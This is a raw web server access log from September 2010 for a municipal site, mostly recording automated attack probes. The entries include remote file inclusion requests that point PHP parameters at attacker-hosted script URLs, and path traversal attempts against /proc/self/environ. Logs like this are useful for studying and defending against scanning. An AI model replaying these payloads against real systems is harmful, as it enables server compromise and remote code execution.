222.236.47.182 - - [01/Sep/2010:08:26:22 -0700] "GET /logs//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:08:26:23 -0700] "GET /admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [01/Sep/2010:08:26:35 -0700] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:27:43 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:27:43 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:27:43 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
67.201.60.20 - - [01/Sep/2010:08:29:37 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
67.201.60.20 - - [01/Sep/2010:08:29:38 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
67.201.60.20 - - [01/Sep/2010:08:29:38 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:31:42 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:31:42 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:31:42 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:16 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:16 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:31 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:31 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:32:37 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:16 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:16 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:22 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:22 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:33:22 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:34:01 -0700] "GET /logs/access_091231.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:34:01 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:34:01 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
99.7.55.150 - - [01/Sep/2010:08:35:36 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
99.7.55.150 - - [01/Sep/2010:08:35:37 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
99.7.55.150 - - [01/Sep/2010:08:35:37 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:37:54 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:37:54 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:37:54 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:38:04 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:38:04 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:38:04 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:26 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:26 -0700] "GET /logs/access_091201.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:26 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:53 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.29.92.6 - - [01/Sep/2010:08:40:53 -0700] "GET /logs/access_091201.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.inhausa.org/data/error???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:49 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:49 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:49 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:56 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:56 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:43:56 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:08:50:09 -0700] "GET /logs/access_091201.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:08:50:09 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
118.129.166.221 - - [01/Sep/2010:08:50:09 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://kwiketa-skwirk.com/images/id1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:53:46 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:53:54 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:53:54 -0700] "GET /logs/access_091231.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:53:54 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:53:56 -0700] "GET /logs/access_091231.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:53:56 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:01 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:25 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:25 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:25 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:26 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:26 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:54:26 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:54:33 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.46.13.84 - - [01/Sep/2010:08:55:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:01:43 -0700] "GET /logs/access_091231.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:01:43 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:01:43 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:02:43 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:02:43 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:02:54 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:02:59 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:02:59 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:03:09 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.13.84 - - [01/Sep/2010:09:11:54 -0700] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:09:14:20 -0700] "GET /logs/administrator/componets/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:09:14:20 -0700] "GET /administrator/componets/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:28 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:28 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:28 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 200 4084 "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:53 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:53 -0700] "GET /logs/access_091201.log/?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:34:53 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 200 4084 "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.46.89.104 - - [01/Sep/2010:09:35:01 -0700] "GET /logs/access_091201.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://oople.com/forums/attachments/1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:50:39 -0700] "POST /logs/access_091201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:50:39 -0700] "POST /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:50:43 -0700] "POST /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:51:17 -0700] "POST /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:51:17 -0700] "POST /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:51:17 -0700] "POST /logs/access_091031.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:51:34 -0700] "POST /logs/access_091231.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
60.191.43.2 - - [01/Sep/2010:09:52:14 -0700] "POST /logs/access_091201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "MaMa CaSpEr" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:06 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:06 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:06 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:07 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:07 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:57:07 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:58:45 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:58:45 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:58:52 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:58:52 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:59:05 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:09:59:12 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:10:06:15 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:10:06:15 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:10:06:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:10:19:43 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:10:19:43 -0700] "GET /logs/access_091201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:10:19:43 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
